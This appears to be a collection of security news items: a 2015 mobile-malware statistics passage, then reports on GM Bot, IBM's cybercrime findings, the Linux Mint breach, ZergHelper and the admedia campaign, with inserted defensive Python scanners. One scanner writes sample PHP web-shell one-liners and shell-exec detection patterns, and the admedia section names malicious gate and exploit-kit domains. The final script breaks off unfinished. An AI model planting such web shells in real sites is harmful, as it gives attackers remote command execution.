The more fake applications that are used, the more effective the monetization of click activity is. Yet another way of distributing adware is by embedding an advertising module in a legitimate application.

This can be done by the author of the application as well as by those who want to make money by exploiting an app’s popularity: when the advertising module is embedded in a clean app without the author’s knowledge, the profits from advertising go to those who added the advert, not the author. Unlike fake apps, this complex app contains some useful functionality. The growth in the volume of adware is caused by the increasing competition among developers of these programs.

The legitimate programs that use various advertising modules are often too aggressive.
Increasingly, advertising modules are delivering as much advertising as possible to the user in a variety of ways, including the installation of new adware programs. Sometimes the adware programs installed on a device can make it almost impossible to use because the user is constantly fighting with advertising windows. RiskTool programs are especially popular in China.

This is because SMS payments for content are very popular in the country.

Almost any game that includes so-called internal purchases (for additional levels of a game, for example) contains an SMS payment module.
In most cases, the user is notified about the potential risks associated with such purchases, but we also consider it necessary to inform our users about the risks.

Because the games in question are popular, the number of RiskTool applications is constantly increasing.

The main contributor to that growth was the RiskTool.AndroidOS.SMSReg family of programs. Although AdWare and RiskTool programs do not cause direct harm to users, they can be very irritating, while RiskTool programs installed on mobile devices can lead to financial losses if used carelessly or manipulated by a cybercriminal. The proportion of SMS Trojans in the overall flow of mobile threats decreased almost 2.4 times – from 20.5% to 8.7%. However, in 2015 we detected even more new SMS Trojans than in 2014.

Activity by this type of malicious program dropped drastically in mid-2014.

This was the result of an AoC (Advice-of-Charge) system being introduced by Russian operators that led to a reduction in the number of so-called affiliate programs distributing SMS Trojans, the majority of which targeted users in Russia.

Top 20 malicious mobile programs

Please note that the ranking of malicious programs below does not include potentially unwanted programs such as RiskTool or AdWare.

    Name                                   % of all attacked users*
 1  DangerousObject.Multi.Generic          44.2
 2  Trojan-SMS.AndroidOS.Podec.a           11.2
 3  Trojan-Downloader.AndroidOS.Leech.a    8.0
 4  Trojan.AndroidOS.Ztorg.a               7.6
 5  Trojan.AndroidOS.Rootnik.d             6.9
 6  Exploit.AndroidOS.Lotoor.be            6.1
 7  Trojan-SMS.AndroidOS.OpFake.a          5.6
 8  Trojan-Spy.AndroidOS.Agent.el          4.0
 9  Trojan.AndroidOS.Guerrilla.a           3.7
10  Trojan.AndroidOS.Mobtes.b              3.6
11  Trojan-Dropper.AndroidOS.Gorpo.a       3.6
12  Trojan.AndroidOS.Rootnik.a             3.5
13  Trojan.AndroidOS.Fadeb.a               3.2
14  Trojan.AndroidOS.Ztorg.pac             2.8
15  Backdoor.AndroidOS.Obad.f              2.7
16  Backdoor.AndroidOS.Ztorg.c             2.2
17  Exploit.AndroidOS.Lotoor.a             2.2
18  Backdoor.AndroidOS.Ztorg.a             2.0
19  Trojan-Ransom.AndroidOS.Small.o        1.9
20  Trojan.AndroidOS.Guerrilla.b           1.8

* Percentage of users attacked by the malware in question, relative to all users attacked

First place is occupied by DangerousObject.Multi.Generic (44.2%), used in malicious programs detected by cloud technologies.

Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object.

This is basically how the very latest malware is detected. Trojan-SMS.AndroidOS.Stealer.a, which was the TOP 20 leader in 2014, came 28th in 2015. Four places in the TOP 20 are occupied by Trojans that steal money from mobile or bank accounts as their main method of monetization.

They are Trojan-SMS.AndroidOS.Podec.a, Trojan-SMS.AndroidOS.OpFake.a, Trojan.AndroidOS.Mobtes.b and Backdoor.AndroidOS.Obad.f.

Trojan-SMS.AndroidOS.Podec.a (11.2%) is in second place.

This Trojan remained among the top three most popular mobile threats throughout 2015.

To recap, the latest versions of this Trojan no longer send paid text messages.

The Trojan is now fully focused on paid subscriptions, making use of CAPTCHA recognition.

Trojan-SMS.AndroidOS.OpFake.a (5.6%) in 7th place is another long-term resident of the TOP 20.
In 2014 it finished in 8th place and remained in the rating throughout all of 2015. Yet another Trojan – Trojan-Ransom.AndroidOS.Small.o (1.9%) – blocks the victim’s phone and extorts money to unblock it.

This mobile Trojan-Ransom program was very popular at the end of 2015 and became the only ransomware program to make the TOP 20.
It first appeared in the ranking in the third quarter of 2015 in 11th place; it came 19th in the overall TOP 20 for 2015.

The Trojan mostly spreads as a porn video player and targets Russian-speaking audiences. More than half (12 out of 20) of the entries in the ranking are Trojans that use aggressive advertising as their primary means of monetization.

They are Trojan-Downloader.AndroidOS.Leech.a, Trojan-Spy.AndroidOS.Agent.el, Trojan-Dropper.AndroidOS.Gorpo.a, Trojan.AndroidOS.Fadeb.a, and two modifications each of Trojan.AndroidOS.Guerrilla, Trojan.AndroidOS.Rootnik, Trojan.AndroidOS.Ztorg and Backdoor.AndroidOS.Ztorg. Unlike the usual advertising modules, these programs do not contain any useful functionality.

Their goal is to deliver as many adverts as possible to the recipient using a variety of methods, including the installation of new advertising programs.

These Trojans can use super-user privileges to conceal their presence in the system folder, from where it will be very difficult to dislodge them. We have come across such Trojans before, mostly in China.

There was a burst of activity by these programs in 2015: most of them targeting users in China, although these Trojans have started being actively distributed worldwide.

The code of the Trojans often contained the word "oversea". The other two places in the TOP 20 are occupied by Exploit.AndroidOS.Lotoor modifications used to obtain local super-user privileges.

Mobile banking Trojans

In 2015, we detected 7,030 mobile banking Trojans, which is 2.6 times less than in 2014 when 16,586 were detected.
It should be noted that although the number of new malware programs fell from the previous year, these programs have become more adept and malign, and the areas of interest among cybercriminals now include banks in numerous countries. Many mobile banking Trojans act independently, without any computer component, and target customers of dozens of banks around the world.

Number of mobile banking Trojans detected by Kaspersky Lab solutions in 2015

56,194 users were attacked by mobile banking Trojans at least once during the year.

Geography of mobile bankers

The number of attacked countries is growing: attacks by mobile banking Trojans were registered in 137 countries and territories worldwide vs 90 countries in 2014.

Geography of mobile banking threats in 2015 (number of users attacked)

Top 10 countries attacked by mobile banking Trojans (ranked by number of users attacked):

    Country       Number of users attacked
 1  Russia        45690
 2  Germany       1532
 3  Ukraine       1206
 4  US            967
 5  Kazakhstan    804
 6  Australia     614
 7  South Korea   527
 8  France        404
 9  Belarus       380
10  Poland        324

As in the previous year, Russia topped the rating of countries attacked by mobile banking Trojans.

Among the newcomers were South Korea, Australia, France and Poland. Lithuania, Azerbaijan, Bulgaria and Uzbekistan left the TOP 10.

Just how popular mobile banking Trojans are with cybercriminals in each country can be shown by the percentage of users who were attacked by these Trojans during the reporting period, relative to all attacked users.

TOP 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users

    Country       % of all attacked users*
 1  South Korea   13.8
 2  Australia     8.9
 3  Russia        5.1
 4  Austria       3.0
 5  Belarus       1.9
 6  US            1.8
 7  Tajikistan    1.7
 8  Ukraine       1.6
 9  France        1.6
10  Uzbekistan    1.6

* Percentage of users attacked by mobile banking Trojans, relative to all attacked users of Kaspersky Lab’s mobile security products in the country.

A substantial portion of mobile banking attacks in South Korea were caused by representatives of the Trojan-Banker.AndroidOS.Wroba family.

These Trojans are designed to steal the mobile bank accounts of the largest Korean banks as well as mTANs. In Australia, the Trojan-Banker.AndroidOS.Acecard family was responsible for most infection attempts.

This family is a new stage in the evolution of Backdoor.AndroidOS.Torec.a, the first Trojan for Android that made use of Tor. We detected this Trojan at the beginning of 2014, while the first banking modifications appeared in mid-2014.

At that time the Trojan was distributed mainly in Russia, and only in 2015 did it begin to spread actively in Australia. One modification, which we detected in November 2015, is able to overlay the interfaces of 24 banking apps with a phishing window.

Five of those apps belong to Australian banks, another four each belong to banks based in Hong Kong, Austria and New Zealand, three each to banks in Germany and Singapore, plus the PayPal app.
In addition, there are modifications which target banks in the US and Russia.

Phishing windows of the Acecard Trojan

Stealing user logins and passwords by displaying a phishing window instead of the genuine app interface is not a new trick. We first came across it back in 2013 in Trojan-SMS.AndroidOS.Svpeng.
In our IT threat evolution in Q1 2015 report we mentioned Trojan-SMS.AndroidOS.OpFake.cc which was capable of attacking at least 29 banking and financial apps.

The latest modification of this Trojan can now attack 114 banking and financial apps.
Its main goal is to steal the login credentials for bank accounts.
It also overlays the windows of several popular mail applications. In Russia, which ranked third in the TOP 10, Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Marcher were the most popular programs used by attackers. Starting in April, we saw a sharp drop in the number of attempts to infect users with representatives of the Trojan-Banker.AndroidOS.Marcher family.

During the five months from April to August, the number of attacks using this Trojan decreased fivefold.
It is possible that the cybercriminals were preparing attacks on users in other countries during that time, because until September 2015 activity by this family was limited almost exclusively to Russia.

From September, however, about 30% of the attacks using this Trojan targeted users in Australia, Germany and France. The aforementioned Trojan-Spy.AndroidOS.SmsThief.fc was distributed in Russia.

The attackers added their code to the original banking app without affecting its performance, making this Trojan more difficult to detect.

Mobile Trojan-Ransom

In 2015, the number of Trojan-Ransom families doubled compared to 2014.

The number of modifications detected during the same period increased 3.5 times and accounted for 6,924. Over the reporting period, mobile ransomware attacked 94,344 unique users which is five times more than in 2014 (18,478).

The share of unique users attacked by Trojan-Ransom programs relative to all users attacked by mobile malware increased from 1.1% to 3.8% during the year. Mobile ransomware attacks were registered in 156 countries and territories at least once during the year.

Geography of mobile ransomware threats in 2015 (number of users attacked)

TOP 10 countries attacked by Trojan-Ransom malware by the number of attacked users:

    Country       Number of attacked users
 1  Russia        44951
 2  Germany       15950
 3  Kazakhstan    8374
 4  US            5371
 5  Ukraine       4250
 6  UK            2878
 7  Italy         1313
 8  Spain         1062
 9  Iran          866
10  India         757

Russia, Germany and Kazakhstan were the countries attacked most often by ransomware. In Russia and Kazakhstan, the Trojan-Ransom.AndroidOS.Small family was most active, in particular the modification Trojan-Ransom.AndroidOS.Small.o, the most popular Trojan-Ransom program in 2015. The Trojan-Ransom.AndroidOS.Pletor family also remained very popular in 2015.
Interestingly, this first mobile encryptor Trojan was developed by the same group of cybercriminals as Trojan-Banker.AndroidOS.Acecard. In Germany, Trojan-Ransom.AndroidOS.Fusob was the most actively distributed family.

Windows opened by the Fusob Trojan

The US came fourth in the ranking.

The Trojan-Ransom.AndroidOS.Fusob family was especially popular in the country, although the Trojan-Ransom.AndroidOS.Svpeng family was also actively used. This ranking depends to a large extent on the number of users in each country, so it is interesting to view a rating that shows the proportion of users attacked by Trojan-Ransom malware relative to all attacked users in the country.

TOP 10 countries attacked by Trojan-Ransom malware – share of users relative to all attacked users in the country

    Country       % of all attacked users*
 1  Kazakhstan    15.1
 2  Germany       14.5
 3  US            10.3
 4  Canada        8.9
 5  Netherlands   8.8
 6  UK            8.3
 7  Switzerland   6.9
 8  Austria       6.4
 9  Ukraine       5.9
10  Australia     5.5

* Percentage of users attacked by Trojan-Ransom malware, relative to all attacked users of Kaspersky Lab’s mobile security products in the country

Russia, which accounted for the largest number of attacked users, was not in the TOP 10.

The leaders of the ranking were Kazakhstan, Germany and the US.

Conclusion

Despite the fact that the first advertising Trojans exploiting super-user privileges for their own purposes appeared a few years ago, in 2015 their number increased substantially and started spreading rapidly.
In the first quarter of 2015 the most popular threats included just one Trojan of this type, but by the end of the year these programs accounted for more than half of the TOP 20.

They are distributed using all available means – via other advertising programs, via app stores and can be even pre-installed in some devices.

The number of advertising Trojans using super-user privileges will most likely continue to grow in 2016. We have already seen cases when advertising Trojans were used to spread malicious mobile programs.

There is every reason to believe that attackers will increasingly use these Trojans to infect mobile devices with malware. We also came across cases where super-user privileges were utilized by other types of malware, especially ransomware. Trojan-Ransom malware is likely to continue evolving in 2016. We expect the popularity of these programs among attackers to grow and their global reach to increase. Another type of Trojan that we intend to continue monitoring closely in 2016 is Trojan-Banker.

There are already lots of banking Trojans that do not require additional software on the victim’s computer.

These Trojans operate independently, and only need to infect the user’s phone to steal his money.

They are able to steal logins and passwords for mobile banking accounts by overlaying the legitimate banking app interfaces with a phishing window.

The Trojans can also steal credit card data using phishing windows.
In addition, they have functionality to intercept communications between a client and a bank – stealing incoming text messages and forwarding calls to the attacker.
In 2016, banking Trojans will attack even more banking institutions and will use new distribution channels and new data theft technologies. As the functionality of mobile devices and mobile services grows, the appetite of cybercriminals who profit from mobile malware will grow too. Malware authors will continue to improve their creations, develop new technologies and look for new ways of spreading mobile malware.

Their main aim is to make money.
In these circumstances, neglecting to protect your mobile devices is extremely risky.
GM Bot can rip creds, steal SMS and phone two factor tokens

Android users could be hit with a new wave of dangerous banking malware following the leak of source code for a capable Android trojan.

Users could be targeted with variants of the malware, known as "GM Bot", that is capable of harvesting usernames and passwords using slick keystroke-capturing website overlays. Since it infects mobile handsets it can steal two factor authentication including SMS and even redirect phone calls.

IBM threat bod Limor Kessem says the leak appears to have come from a GM Bot buyer and is bad news for users.

"This turnkey capability is the true differentiator; previous mobile malware could steal SMS codes, but those would have been meaningless without phishing schemes or a trojan on the victim’s PC to steal access credentials," Kessem says. "The reverse was also true: phishers and PC trojan operators could not facilitate fraudulent transactions without mobile malware to intercept the SMS codes or calls from the bank.

"In short, mobile banking trojans such as GM Bot are a one-stop fraud shop for criminals."

Attackers can target any website or banking app to harvest credentials and tokens from infected phones.

GM Bot was first discovered late last year when CERT Poland described the malware as a simple but effective bank raiding tool. The CERT's researchers said of the malware that "... the attacker needs only to infect the Android phone and there is no need for a Windows counterpart."

The malware joins the ranks of other leaked PC trojans including Zeus, SpyEye, and Carberp. If history is a judge, it is likely the malware will result in various low- and high-quality spin-offs.

Users should update their handsets to the latest Android versions which contain more rigorous security and permission checks.

Those who cannot upgrade from old versions on account of vendors no longer shipping updates can consider installing custom but well-supported-and-maintained ROMs such as Cyanogenmod and NamelessROM.
Criminals are becoming more organized by employing teams of developers that create more sophisticated malware that produces larger monetary gains, states an IBM report.

Cyber-criminals increasingly used customized malware, software-development expertise and knowledge of the financial system to make 2015 an extremely profitable year—a trend that will continue in 2016, according to IBM’s annual threat report, published on Feb. 22. Using three families of malware—Dyre, Dridex and Carbanak—cyber-criminals have stolen hundreds of millions of U.S. dollars. Over two years, for example, the Carbanak malware infiltrated as many as 100 financial institutions to steal an estimated $1 billion, a brazen heist that came to light last year.

The trend departs from the traditional image of a cybercriminal: the lone, amateur criminal who typically focused on smaller thefts from consumer accounts, Limor Kessem, security researcher for IBM’s X-Force research group, told eWEEK. The evolution toward more sophisticated, highly organized cyber-crime that results in higher losses will likely continue in 2016, the IBM report stated.

“From the nature of those organized groups, they bring that research and the planning and the resources that … has helped them push their ability to make so much money at once,” Kessem said. “Even just a couple of years ago, we did not see $1 million, $3.5 million and $5 million transfers.”

The maturing of the criminal ecosystem is one of the major trends noted in information security this year, according to IBM.

About 18 percent of attacks detected by IBM used some form of malware, representing the largest category of threats recorded in 2015, according to the report.

Distributed denial-of-service attacks accounted for about 15 percent of threats and attacks on misconfigured systems and networks for about 8 percent. In a separate threat report, Dell SonicWALL stated its products had captured 64 million malware variants attacking customers, up from 37 million the year before.

Four families of malware – Dyre, Neverquest, Bugat, also known as Dridex, and Zeus V2 – made up nearly three-quarters of all malware attacks recorded by IBM in 2015. On its own, the group behind the Dyre malware accounted for 24 percent of attacks detected by the firm.

The group, however, has largely been silent since late November. Some media outlets have reported that members of the group have been arrested by Russian law enforcement, but Russian authorities have not confirmed the arrests.

The behavior of the groups behind Dyre and Dridex show significant similarities, suggesting – at the very least – that they may be using the same playbook, Kessem said. “Everything that Dyre was doing, Dridex was suddenly doing,” she said. “The same techniques, the same sorts of things.

The redirection attacks that Dyre came up with, (for example) all the sudden Dridex was launching them.”

With the sudden disappearance of Dyre in November, other malware has topped the charts. Now, Neverquest, Dridex, Zeus V2, and a fourth program, Gozi, make up three-quarters of all attacks, according to Kessem.

IBM’s report focused on a few other areas of the threat landscape as well.

The number of vulnerabilities reported during the year did not change in 2015, while mobile malware started taking off, the company said. The most targeted industries included computer services, which were the victims in more than 30 percent of attacks, followed by retail, 15 percent, and healthcare, 9 percent. Both Dell and IBM noted an increase in mobile malware targeting the financial industry.
Attackers manage to breach Linux Mint's security, adding a backdoor to the distribution and even stealing information from user forums. The Linux Mint operating system community is reeling today after the public disclosure on Feb. 21 that hackers managed to infiltrate the popular Linux distribution and plant a backdoor in the system.

Adding further insult to injury, hackers were also able to compromise the Linux Mint user forum, stealing username and password information.

As a result of the attack, the LinuxMint.com Website is now offline as the distribution scrambles to restore confidence and security. Linux Mint has emerged in recent years to become one of the most popular desktop Linux distributions in the world.

A key part of Linux Mint's popularity is its Cinnamon desktop, which provides users with a different user interface from the more standard GNOME desktop. Linux Mint does, however, offer other desktop choices to users as well.

It appears that on Feb. 20 the attackers were only able to impact the most recent Linux Mint 17.3 Cinnamon edition (which eWEEK reviewed here), according to Clement Lefebvre, founder of Linux Mint. Lefebvre noted the intrusion was brief and quickly discovered. "Hackers made a modified Linux Mint ISO, with a backdoor in it, and managed to hack our website to point to it," he wrote.

In addition to the hacked Linux Mint 17.3 Cinnamon Edition download, the attackers also compromised the user forums site (forums.linuxmint.com), stealing a copy of the entire database. Hackers now have usernames and passwords used on the Linux Mint forum Websites, and so it is imperative that users make sure they aren't using the same username/password combination on other sites.

In terms of root cause for the breach of Linux Mint's security, the finger is being pointed at a security issue with a poorly configured WordPress content management system (CMS) component. "We found an uploaded php backdoor in the theme directory of a wordpress installation, which was one day old and had no plugins running," Lefebvre commented.

Lefebvre explained that the WordPress theme was new and was set up with incomplete file permissions. The vulnerability was not an exploit of the WordPress core application, and Linux Mint is running the latest version of WordPress, he said. The WordPress 4.4.2 update debuted at the beginning of February, patching a pair of security flaws.

After gaining access to the Linux Mint Website by way of the vulnerable WordPress theme component, the attackers were able to point the Linux Mint 17.3 Cinnamon edition download link to a malicious version of the operating system that embeds the Tsunami Trojan.
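A defender-side check for the kind of dropped file Lefebvre describes, as an added example that is not Linux Mint's or WordPress's own code: it walks a wp-content-style tree and flags PHP files in the theme or upload directories that are world-writable, recently modified, or contain common web-shell indicators. The directory layout, the indicator patterns and the sample files are assumptions constructed for this example.

```python
"""Scan a WordPress wp-content tree for PHP files that look like a dropped
backdoor. Added example for the incident described above; it is not Linux
Mint's or WordPress's own tooling. The directory layout, the file names and
the indicator list are assumptions, and the sample tree is constructed here.
"""
import os
import re
import stat
import tempfile
import time

# Indicator regexes typical of PHP web shells: code execution fed by
# obfuscated or request-controlled input. Illustrative, not exhaustive.
INDICATORS = [
    ("eval of decoded blob",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\b", re.I)),
    ("shell exec of request input",
     re.compile(r"\b(system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("assert of request input",
     re.compile(r"\bassert\s*\(\s*\$_(GET|POST|REQUEST)\b", re.I)),
]

# Theme and upload directories should not gain new PHP files at runtime, so
# a fresh or world-writable PHP file there is worth a look on its own.
WATCHED_SUBDIRS = ("themes", "uploads")
PHP_SUFFIXES = (".php", ".phtml", ".php5", ".phar")


def scan_wp_content(root, max_age_days=7, now=None):
    """Return [(relative_path, [reasons])] for every PHP file worth triage."""
    now = time.time() if now is None else now
    findings = []
    for sub in WATCHED_SUBDIRS:
        for dirpath, _dirs, files in os.walk(os.path.join(root, sub)):
            for name in sorted(files):
                if not name.lower().endswith(PHP_SUFFIXES):
                    continue
                path = os.path.join(dirpath, name)
                reasons = []
                st = os.stat(path)
                if st.st_mode & stat.S_IWOTH:
                    reasons.append("world-writable")
                if now - st.st_mtime < max_age_days * 86400:
                    reasons.append("modified within %d days" % max_age_days)
                if sub == "uploads":
                    reasons.append("php file under uploads")
                with open(path, "r", errors="replace") as fh:
                    body = fh.read()
                for label, pattern in INDICATORS:
                    if pattern.search(body):
                        reasons.append("content: " + label)
                if reasons:
                    rel = os.path.relpath(path, root).replace(os.sep, "/")
                    findings.append((rel, reasons))
    return findings


def build_sample_tree():
    """Create a constructed wp-content tree with one clean theme file, one
    backdoored theme file and one shell under uploads; returns its root."""
    root = tempfile.mkdtemp(prefix="wp-content-")
    old = time.time() - 60 * 86400  # a file that has sat untouched for two months

    def write(rel, body, mode=0o644, mtime=None):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
        if mtime is not None:
            os.utime(path, (mtime, mtime))

    # Legitimate, long-standing theme file: should produce no finding.
    write("themes/twentysixteen/functions.php",
          "<?php add_action('init', 'theme_setup'); ?>", mtime=old)
    # Dropped "cache" file in the theme directory: fresh, loose permissions,
    # eval of a base64 blob. Constructed sample, not a real backdoor.
    write("themes/twentysixteen/wp-cache.php",
          "<?php eval(base64_decode($_POST['c'])); ?>", mode=0o666)
    # A non-PHP upload is ignored; a PHP file next to it is not.
    write("uploads/2016/02/photo.jpg", "not really a jpeg")
    write("uploads/2016/02/s.php", "<?php system($_GET['cmd']); ?>")
    return root


if __name__ == "__main__":
    for rel, why in scan_wp_content(build_sample_tree()):
        print(rel, "->", "; ".join(why))
```

Run against a real installation, `scan_wp_content("/var/www/html/wp-content")` is a triage list, not a verdict: a theme update legitimately touches files, so the mtime and permission reasons are there to focus review, while a content hit on a file in `uploads` should be treated as an incident until proven otherwise.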

Tsunami is not a new form of malware, and it's not unique to Linux either.

Back in 2011, Tsunami was able to hijack Apple Mac OS X systems in order to launch distributed denial-of-service (DDoS) attacks.

In regard to who is responsible for the attack, Linux Mint has identified that the hacked versions of its operating system were pointed to servers located in Sofia, Bulgaria. "What we don't know is the motivation behind this attack," Lefebvre wrote. "If more efforts are made to attack our project and if the goal is to hurt us, we'll get in touch with authorities and security firms to confront the people behind this."

Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com.

Follow him on Twitter @TechJournalist.
A Chinese iOS application recently found on Apple's official store contained hidden features that allow users to install pirated apps on non-jailbroken devices.
Its creators took advantage of a relatively new feature that lets iOS developers obtain free code-signing certificates for limited app deployment and testing. The number of malware programs for iOS has been very low until now primarily because of Apple's strict control of its ecosystem.

Devices that have not been jailbroken -- having their security restrictions removed -- only allow apps obtained from the official App Store, after they've been reviewed and approved by Apple. There is a separate method for enterprises to distribute in-house developed apps to iOS devices without publishing them on the app store, but it relies on special code-signing certificates obtained through the Apple Developer Enterprise Program. Enterprise certificates have been used to install malware on non-jailbroken iOS devices in the past and it is one of the techniques used by the newly found Chinese app, which is called ZergHelper or XY Helper. However, it's not the most interesting one. According to researchers from security firm Palo Alto Networks, ZergHelper also abuses personal development certificates, a new type of code-signing certificate introduced by Apple with the release of Xcode 7.0 in September. Xcode is the main tool -- or integrated development environment (IDE) -- used to develop iOS and Mac OS X apps. Starting with Xcode 7, developers can build apps, sign them and have them run on their own devices without publishing them in the app store.

This makes it a lot easier to test apps without enrolling in Apple's Developer Program, which requires a $99 per year subscription. To generate personal development certificates, app makers have to use Xcode with their phone connected to their computer.

The exact process in which Xcode obtains the certificates from Apple is not publicly documented, but the ZergHelper creators seem to have figured it out. "We think someone has reverse-engineered Xcode in detail to analyze this part of code so that they can implement exactly the same behaviors with Xcode -- in effect, successfully cheating Apple’s server," the Palo Alto Networks researchers said in a blog post. Some people have expressed concerns after the feature was released last year that attackers might abuse it to create and distribute malware to non-jailbroken devices. ZergHelper is evidence that this is indeed possible, highlighting its potential for abuse "in a wide-ranging and automated way," the researchers said. In fact, someone was recently selling code on a popular Chinese security forum that could automatically register Apple IDs and then generate personal development certificates for them.

That post has since been deleted, the researchers said. ZergHelper is also providing free Apple IDs to users and it's not clear where those IDs are coming from and whether the app steals them from other devices.

The app was available in the official app store from the end of October until Saturday, when Apple removed it after being alerted by Palo Alto Networks. The company's researchers found no explicitly malicious behavior in ZergHelper so far, its main goal being to act as an alternative app store that allows users to install cracked games and other pirated apps without jailbreaking their iOS devices. Its creators appear to have tricked Apple's reviewers by using simple tricks.

The app was submitted to the app store under the name "Happy Daily English" (in Chinese) and was presented as a helper app for learning English. Once installed on a phone, the app behaved as advertised if the user's IP (Internet Protocol) address was from outside mainland China. However, if the address was from China, a different interface would appear that would guide users through installing a provisioning profile.

This is similar to the process that a device goes through when it's enrolled into a mobile device management system. Once done, users could install apps from the alternative app store. Some of them were signed with stolen enterprise certificates, but others were signed with the new personal development certificates that Xcode generates for free. "We don’t know where the App Store reviewers are located," the Palo Alto Networks researchers said. "If they are not located in mainland China, this method could trick them into seeing a legitimate app.

Even if they’re in China, the author could just shut down that webpage during the review period so that reviewer could not see the actual functionality through an analysis of its behavior." The app also used another increasingly popular technique that allows developers to dynamically change their apps' code without submitting a new version to the official app store for review.

This was done by integrating a framework called wax that bridges Lua scripting to native iOS Objective-C methods. While ZergHelper is not malware per se, the techniques it uses could inspire future malicious attacks. Stolen enterprise certificates have been abused in the past, but ZergHelper takes it one step further by automatically generating free personal development certificates. "This is of concern because the abuse of these certificates may be the first step toward future attacks," the Palo Alto Networks researchers said.
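A practical first check when a profile like the one ZergHelper installs turns up on a device is to look at what kind of provisioning profile it is. The following Python script is an added example, not code from the Palo Alto Networks write-up or from Apple: it pulls the embedded property list out of a .mobileprovision blob (without verifying the CMS signature, which is a separate step) and classifies it as App Store, ad hoc, development or enterprise (in-house) from the ProvisionsAllDevices, ProvisionedDevices and get-task-allow keys. The sample profile, team name, bundle ID and device UDID are constructed; the seven-day threshold used to flag very short-lived profiles is an assumption, not something the article states.

```python
"""Classify an iOS provisioning profile (.mobileprovision) for triage.

Added example, not code from the ZergHelper write-up, Palo Alto Networks or
Apple. The sample profile below is constructed; real profiles are CMS
(PKCS#7) signed blobs that wrap this same XML property list.
"""
import plistlib
from datetime import datetime, timezone

# Assumption: a profile valid for a week or less is flagged as a likely
# free personal-team profile. The article does not give this number.
SHORT_LIFETIME_DAYS = 7

# Constructed sample: the shape of a development profile Xcode generates
# when signing for one specific device. Team, bundle ID and UDID are made up.
SAMPLE_DEV_PROFILE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>AppIDName</key><string>XC com example helper</string>
  <key>Name</key><string>iOS Team Provisioning Profile: com.example.helper</string>
  <key>TeamName</key><string>Example Person</string>
  <key>TeamIdentifier</key><array><string>ABCDE12345</string></array>
  <key>CreationDate</key><date>2016-02-23T00:00:00Z</date>
  <key>ExpirationDate</key><date>2016-03-01T00:00:00Z</date>
  <key>ProvisionedDevices</key><array><string>00000000000000000000000000000000deadbeef</string></array>
  <key>Entitlements</key>
  <dict>
    <key>application-identifier</key><string>ABCDE12345.com.example.helper</string>
    <key>get-task-allow</key><true/>
  </dict>
</dict>
</plist>
"""


def extract_plist(blob):
    """Pull the XML plist out of a .mobileprovision. The CMS wrapper is
    skipped, not verified: check the signature separately (for example with
    `security cms -D` on macOS) before trusting any of these values."""
    start = blob.find(b"<?xml")
    end = blob.find(b"</plist>")
    if start < 0 or end < 0:
        raise ValueError("no embedded plist found in profile")
    return plistlib.loads(blob[start:end + len(b"</plist>")])


def classify(profile, now=None):
    """Return the profile kind plus the fields an analyst wants to see."""
    if now is None:
        now = datetime.now(timezone.utc).replace(tzinfo=None)
    elif isinstance(now, str):
        now = datetime.fromisoformat(now)
    entitlements = profile.get("Entitlements", {})
    devices = profile.get("ProvisionedDevices") or []

    if profile.get("ProvisionsAllDevices"):
        kind = "enterprise"      # in-house distribution: runs on any device
    elif devices and entitlements.get("get-task-allow"):
        kind = "development"     # debuggable, tied to listed device UDIDs
    elif devices:
        kind = "ad-hoc"          # tied to listed devices, not debuggable
    else:
        kind = "app-store"

    flags = []
    if kind == "enterprise":
        flags.append("in-house profile: confirm TeamName/TeamIdentifier belong to your organisation")
    if kind == "development":
        flags.append("developer-signed build: not expected on a non-developer device")

    expires = profile.get("ExpirationDate")   # plistlib returns naive datetimes
    created = profile.get("CreationDate")
    days_left = (expires - now).days if expires else None
    lifetime = (expires - created).days if expires and created else None
    if days_left is not None and days_left < 0:
        flags.append("profile expired")
    if lifetime is not None and lifetime <= SHORT_LIFETIME_DAYS:
        flags.append("very short validity window (heuristic for free personal-team profiles)")

    return {
        "kind": kind,
        "team": profile.get("TeamName"),
        "team_ids": profile.get("TeamIdentifier", []),
        "app_id": entitlements.get("application-identifier"),
        "devices": len(devices),
        "days_left": days_left,
        "lifetime_days": lifetime,
        "flags": flags,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(classify(extract_plist(SAMPLE_DEV_PROFILE)), indent=2))
```

On a real device the interesting cases are an "enterprise" profile whose team is not yours, and a "development" profile on a phone that has never been plugged into Xcode: both are how ZergHelper gets its payloads to run.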
'Admedia' campaign decides the world of WordPress is not enough.


Bwahahahaha! The Internet Storm Center (ISC) has spotted 'admedia attacks' breaking out of their original WordPress vectors. In a post late last week, the ISC (courtesy of author Brad Duncan) reported that “the group behind the WordPress 'admedia' campaign” is now attacking Joomla-hosted sites. The other evolution in the campaign, Duncan notes, is that since it was first noticed at the beginning of this month, mostly dropping the Nuclear exploit kit on target sites, it has now added Angler. Duncan, who is also a security researcher at Rackspace, notes that the attackers have started using “megaadvertize” in their gateway URLs (instead of “admedia” as was used when the attack was first spotted). The technique, however, stays the same: the target site is compromised to generate hidden iframes in visitors' browsers, and the malicious URLs act as a “gate between the compromised Website and the EK [exploit kit – The Register] server”.

For example:
- img.belayamorda.info - admedia gate;
- ssd.summerspellman.com - Angler EK;
- clothdiapersexpert.com - TeslaCrypt callback traffic.

As before, Duncan writes, a script injection was the initial attack, with the JavaScript files from the compromised site carrying appended malicious scripts.

From there it's a short walk to ransomware hell.
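The admedia chain described above starts with code appended to a site's own JavaScript files, so the simplest defensive check is to compare each served .js file against its deployed baseline and inspect anything that was appended. The script below is an added example, not code from the ISC diary or from The Register. It records the length and SHA-256 of each deployed file, classifies a later copy as clean, appended, modified or truncated, and runs two heuristics over the content: the gate keywords the ISC saw in URLs ("admedia", "megaadvertize") and iframe-creating code that hides the frame (1x1, display:none). The clean script and the injected tail are constructed stand-ins; the campaign's real injected code is not reproduced here and the gate URL is hypothetical.

```python
"""Spot code appended to a site's JavaScript files, the injection step of the
admedia/megaadvertize campaign described above.

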